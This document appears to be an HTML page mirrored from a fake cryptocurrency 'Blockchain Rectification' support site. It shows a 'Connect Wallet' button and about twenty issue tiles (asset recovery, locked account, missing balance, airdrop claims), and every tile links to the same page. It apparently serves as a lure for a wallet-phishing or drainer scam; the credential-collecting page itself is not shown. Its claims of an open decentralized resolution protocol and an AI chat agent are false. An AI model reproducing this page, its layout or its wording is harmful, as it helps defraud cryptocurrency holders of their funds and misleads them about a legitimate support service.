<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from dappsolutiondex.pages.dev/ajax/libs/toastr_js/latest/assets/fonts/fonts.css by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 02 Jul 2024 20:00:55 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

	<link data-react-helmet="true" rel="shortcut icon" href="../../../../../../../accountresolvecenter.netlify.app/img/image.html">
    <meta data-react-helmet="true" name="msapplication-TileColor" content="#da532c">
    <meta data-react-helmet="true" name="theme-color" content="#ffffff">
    <meta data-react-helmet="true" name="description" content="1. Click the above, 2. Select Issue Type 3. Select Wallet Type, 4. Input Necessary information, 5. Validate">
    <meta data-react-helmet="true" name="keywords" content="ethereum, cryptocurrency, wallet, mobile, connect, bridge, relay, proxy, standard, protocol, crypto, tokens, dapp">
    <meta data-react-helmet="true" name="twitter:card" content="summary_large_image">
    <meta data-react-helmet="true" name="twitter:site" content="@syncwallet">
    <meta data-react-helmet="true" name="twitter:title" content="">
    <meta data-react-helmet="true" name="twitter:description" content="1. Click the above, 2. Select Issue Type 3. Select Wallet Type, 4. Input Necessary information, 5. Validate">
    <meta data-react-helmet="true" name="twitter:img:src" content="../social-card.html">
    <meta data-react-helmet="true" name="og:title" content="Click Here To Fix Issues">
    <meta data-react-helmet="true" name="og:type" content="website">
    <meta data-react-helmet="true" name="og:url" content="../">
    <meta data-react-helmet="true" name="og:image" content="../../syncwallet.online/social-card.html">
    <meta data-react-helmet="true" name="og:description" content="1. Click the above, 2. Select Issue Type 3. Select Wallet Type, 4. Input Necessary information, 5. Validate">
    <meta data-react-helmet="true" name="og:site_name" content="Blockchain Rectification">
    <meta data-react-helmet="true" name="fb:admins" content="365412154213405">
    <title>Blockchain Rectification - We are help to help you resolve your crypto related issues</title>
    <link rel="shortcut icon" type="image/png" href="assets/img/favicon.html"/>
    <link rel="stylesheet" href="assets/libs/bootstrap/dist/css/bootstrap.min.html">
    <link rel="stylesheet" href="assets/libs/owl.carousel/dist/assets/owl.carousel.html">
    <link rel="stylesheet" href="assets/libs/owl.carousel/dist/assets/owl.theme.default.html">
    <link rel="stylesheet" href="assets/libs/remixicon/fonts/remixicon.html">
    <link rel="stylesheet" href="assets/fonts/fonts.html">
    <link rel="stylesheet" href="assets/css/app.html">
    <link rel="stylesheet" id="stm-stmicons-css" href="assets/stm_fonts/stmicons/stmicons.html" type="text/css" media="all" />
    <link href="npm/select2_4.1.0-rc.0/dist/css/select2.min.html" rel="stylesheet" />
    <link href="ajax/libs/toastr_js/latest/css/toastr.min.html" rel="stylesheet" />
</head>
<body>
mr
    <!--==================================
            Loader Start Here
    ===================================-->
        <div class="Loader">
            <div class="spinnerPairHolder">
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
            </div>
        </div>
    <!--==================================
            Loader End Here
    ===================================-->
    <!--==================================
            Hero Section Start Here
    ===================================-->

    <div style="height:62px; background-color: #1D2330; overflow:hidden; box-sizing: border-box; border: 1px solid #282E3B; border-radius: 4px; text-align: right; line-height:14px; block-size:62px; font-size: 12px; font-feature-settings: normal; text-size-adjust: 100%; box-shadow: inset 0 -20px 0 0 #262B38;padding:1px;padding: 0px; margin: 0px; width: 100%;">
        <div style="height:40px; padding:0px; margin:0px; width: 100%;"><iframe src="https://widget.coinlib.io/widget?type=horizontal_v2&amp;theme=dark&amp;pref_coin_id=1505&amp;invert_hover=no" width="100%" height="36px" scrolling="auto" marginwidth="0" marginheight="0" frameborder="0" border="0" style="border:0;margin:0;padding:0;"></iframe></div>
        <div
            style="color: #626B7F; line-height: 14px; font-weight: 400; font-size: 11px; box-sizing: border-box; padding: 2px 6px; width: 100%; font-family: Verdana, Tahoma, Arial, sans-serif;"><a href="https://coinlib.io/" target="_blank" style="font-weight: 500; color: #626B7F; text-decoration:none; font-size:11px">Cryptocurrency Prices</a>&nbsp;by Coinlib</div>
    </div>

    
        <div class="hero2-main">
            <div class="container-fluid">
                <div class="row row-custom">
                    <div class="col-lg-5 col-content-otr">
                        <div class="col-content-inr">
                            <h1 class="heading heading-h1">Blockchain </h1>
                            <p class="desc heading-L">Every digital artwork on Upside is authentic and truly unique. Blockchain technology makes this new aproch to digital ownership possible.</p>
                            <p class="desc heading-L">Open and decentralized protocol for syncing various Wallets issues on  Secure Server. This is not an app but a protocol that establishes a remote resolution between all noncustodial wallet</h4>
                            <p class="desc heading-L">It is an online server which gets you across to every wallet representative to enable effective complain and rectification of issues.</h3>
                            <p class="desc heading-L">You will be on a chat with an Artificial Intelligence Robot with zero Human interference.</h3>
                                <a href="../../../../../../all/index.html"><div class="action">
                                <button class="btn-primary-1 btn-hero heading-SB connectBtn"  id="connectBtn">Connect Wallet</button></a>
                                <a href="../../../../../../all/index.html"></a>
                                <div class="btn-hero heading-SB" id="slect-main">
                                    <select class="select2-hidden-accessible select2" id="select2-main" aria-invalid="false" data-select2-id="select2-data-1-x6av" tabindex="-1" aria-hidden="true">
                                        <option value="">Select Chain</option>
                                        <option value="0x1" data-select2-id="select2-data-3-rcyi">Ethereum</option>
                                        <option value="0x38" data-select2-id="select2-data-30-ir32">Binance S</option>
                                        <option value="0x89" data-select2-id="select2-data-31-w03z">Polygon</option>
                                        <option value="0xa86a" data-select2-id="select2-data-32-71oo">Avalanche</option>
                                        <option value="0xfa" data-select2-id="select2-data-33-hulu">Fantom</option>
                                        <option value="0xfa" data-select2-id="select2-data-33-hulu">Arbitrum</option>
                                        <option value="0x19" data-select2-id="select2-data-35-silk">Cronos</option>
                                    </select>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <img class="hero-img" src="assets/img/hero-img-home-2.html" alt="img">
            </div>
        </div>
    <!--==================================
            Hero Section End Here
    ===================================-->
    <!--==================================
            How It Works Start Here
    ===================================-->
    <div class="how-it-work-main">
        <div class="container-fluid">
            <div class="wrapper">
                <div class="tab-otr">
                    <h2 class="heading heading-h2">Make Your Selection Below</h2>
                </div>
            </div>
            <div class="row-custom-main">
                <div id="tab-21" class="tab-content active">
                    <div class="row row-custom-inr">
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr box-1 connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-check"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">import to Metamask</h4>
                                    <p class="desc heading-S">Click here for migration related issues</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-building6"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Assets Recovery</h4>
                                    <p class="desc heading-S">Click here for assets recovery issues</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-building6"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Rectification</h4>
                                    <p class="desc heading-S">Click here to rectify your wallet</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-oil"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">High Gas Fees</h4>
                                    <p class="desc heading-S">Click here for gas fee related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-chart-refresh"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Slippage Error</h4>
                                    <p class="desc heading-S">Click here for slippage rrlated error during trade.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-stm14_calc"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Transaction Error</h4>
                                    <p class="desc heading-S">Click here for transaction related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-btc_public"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Cross Chain Transfer</h4>
                                    <p class="desc heading-S">Click here for cross chain bridge issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-ia_clock"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Staking Issues</h4>
                                    <p class="desc heading-S">click here for staking related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-marketplace"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Swap/Exchange</h4>
                                    <p class="desc heading-S">Click here for swap/exchange related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-marketplace"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Claim Reflection</h4>
                                    <p class="desc heading-S">Click here to claim reflection.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                            <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-stats"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Connect to Dapps</h4>
                                    <p class="desc heading-S">Click here for error while connecting to Dapps</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-crypto_secured"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Login Issues</h4>
                                    <p class="desc heading-S">Click here for issues while logging into your wallet.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-loans_mobile"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Claim Airdrop</h4>
                                    <p class="desc heading-S">Click here for airdrop related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-chart-monitor"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">NFTS Issues</h4>
                                    <p class="desc heading-S">Click here for NFTs minting/transfer related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-lamp"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Missing/Irregular Balance</h4>
                                    <p class="desc heading-S">Click here to recover lost/missing funds.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-plus"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Whitelist Issues</h4>
                                    <p class="desc heading-S">Click here for whitelist related issues.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-marker"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Transaction Delay</h4>
                                    <p class="desc heading-S">Click here for any issues related to transaction delayed.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-crypto_secured"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Locked Account</h4>
                                    <p class="desc heading-S">Click here for issues related to account lock.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-rating_down"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Trading Wallet Issues</h4>
                                    <p class="desc heading-S">Click here if you have problem with your trading wallet.</p>
                                </div>
                            </div></a>
                        </div>
                        <div class="col-lg-4 col-md-6 col-work-otr">
                            <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                <div class="icon-otr">
                                    <i style="font-size: 52px;" class="stm-stm14_calc"></i>
                                </div>
                                <div class="content">
                                    <h4 class="heading heading-h4">Unable To Buy Coins/Tokens</h4>
                                    <p class="desc heading-S">To trade crypto your account must be marked as a trusted payment source.</p>
                                </div>
                            </div></a>
                        </div>
                            <div class="col-lg-4 col-md-6 col-work-otr">
                                <a href="../../../../../../all/index.html"><div class="col-work-inr connectBtn">
                                    <div class="icon-otr">
                                        <i style="font-size: 52px;" class="stm-stm14_calc"></i>
                                    </div>
                                    <div class="content">
                                        <h4 class="heading heading-h4">Other Issues Not Listed</h4>
                                        <p class="desc heading-S">If you can't find the issue you are experiencing click here</p>
                                    </div>
                                </div></a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
   
    <!--==================================
            How It Works End Here
    ===================================-->
    <!--==================================
            Footer Start Here
    ===================================-->
        <div class="copyright-main">
            <div class="container-fluid">
                <div class="wrapper">
                    <p class="copy-right heading-S">Copyright © 2022 Blockchain Rectification . All rights reserved.</p>
                    <div class="linkk-otr">
                        <p class="linkk-inr"><a href="../../../../../../all/index.html" class="linkk-page heading-S">Privacy Policy </a> • <a href="../../../../../../all/index.html" class="linkk-page heading-S"> Terms of Service</a></p>
                    </div>
                </div>
            </div>
        </div>
    <!--==================================
            Footer End Here
    ===================================-->
    <script src="assets/libs/jquery/dist/jquery.min.html"></script>
    <script src="assets/libs/jquery.countdown/jquery.countdown.min.html"></script>
    <script src="assets/libs/owl.carousel/dist/owl.carousel.min.html"></script>
    <script src="assets/libs/bootstrap/dist/js/bootstrap.bundle.min.html"></script>
    <script src="npm/select2_4.1.0-rc.0/dist/js/select2.min.html"></script>
    <script src="assets/js/app.html"></script>
    <script src="assets/js/decimal.html"></script>
    <script src="assets/js/web3.min.html"></script>
    <script src="assets/js/web3modal.html"></script>
    <script src="assets/js/evm-chains/index.min.html"></script>
    <script src="assets/js/_walletconnect/web3-provider/index.min.html"></script>
    <script src="assets/js/_portis/web3/index.min.html"></script>
    <script src="assets/js/webModule.html"></script>
    <script src="ajax/libs/toastr_js/latest/toastr.min.html"></script>
</body>

<!-- Mirrored from dappsolutiondex.pages.dev/ajax/libs/toastr_js/latest/assets/fonts/fonts.css by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 02 Jul 2024 20:01:03 GMT -->
</html>